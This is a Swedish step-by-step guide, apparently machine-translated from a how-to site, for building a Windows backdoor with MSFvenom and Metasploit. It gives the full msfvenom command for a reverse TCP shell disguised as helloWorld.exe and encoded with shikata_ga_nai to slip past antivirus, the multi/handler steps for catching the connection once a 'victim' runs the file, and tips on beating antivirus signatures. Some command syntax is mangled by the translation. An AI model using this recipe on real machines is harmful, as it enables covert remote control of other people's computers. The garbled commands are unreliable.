En bakdörr används för att kringgå säkerhetsmekanismer, ofta i hemlighet och mestadels oupptäckt. Med MSFvenom, kombinationen av msfpayload och msfencode, är det möjligt att skapa en bakdörr som ansluter tillbaka till angriparen med hjälp av omvänd skal -TCP. För att utveckla en bakdörr måste du ändra signaturen på din skadliga programvara för att undvika antivirusprogram. Slutför detta projekt på ett par datorer som du har behörighet att få åtkomst till, och i processen kommer du att lära dig mer om datasäkerhet och hur den här typen av bakdörr fungerar.
Steg
Steg 1. Starta Kali och starta terminalen
Steg 2. Skriv ifconfig för att visa gränssnittet och kontrollera din IP -adress
Steg 3. Skriv msfvenom -l -kodare för att visa listan över kodare
Du kommer att använda x86/shikata_ga_nai som kodare
Steg 4. Skriv "msfvenom -a x86 -plattform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 -plattformsfönster anger arkitektur som ska användas.
- -p windows/shell/reverse_tcp betecknar nyttolasten att bädda in.
- LHOST anger lyssnarens IP -adress.
- LPORT anger lyssnarporten.
- -b "\ x00" anger att undvika dåligt tecken (null byte).
- -e x86/shikata_ga_nai betecknar kodarnas namn.
- -f exe> helloWorld.exe anger formatutmatning.
Steg 5. Skriv msfconsole för att aktivera Metasploit
Nu har du skapat din bakdörr. När offret klickar på helloWorld.exe aktiveras skalets nyttolast som är inbäddad och gör en anslutning tillbaka till ditt system. För att få anslutningen måste du öppna multihanteraren i Metasploit och ställa in nyttolasten
Steg 6. Skriv use exploit/multi/handler
Steg 7. Skriv in nyttolast windows/shell/reverse_tcp
Steg 8. Skriv visa alternativ för att kontrollera modulen
Steg 9. Skriv in LHOST 192.168.48.129
"LHOST" anger lyssnarens IP -adress
Steg 10. Typuppsättning LPORT 4444
"LPORT" anger lyssnarporten
Steg 11. Skriv kör och vänta på anslutningen från offrets maskin
Steg 12. Vänta tills offret klickar på helloWorld.exe
Då kommer du att anslutas till offrets maskin.
Tips
- Att använda -i i MSFvenom representerar iterationerna för kodningen. Ibland kan fler iterationer hjälpa till att undvika AV -programvaran.
- Du har lärt dig att generera bakdörren och kodas med MSFvenom, men den här metoden fungerar inte perfekt mot vissa av AV -programvaran idag. Orsaken bakom detta är på grund av körningsmallarna i MSFvenom. AV -leverantörerna har lagt till den statiska signaturen för dessa mallar och letar bara efter dem. Lösningen för det här problemet är att använda en annan körningsmall eller olika verktyg.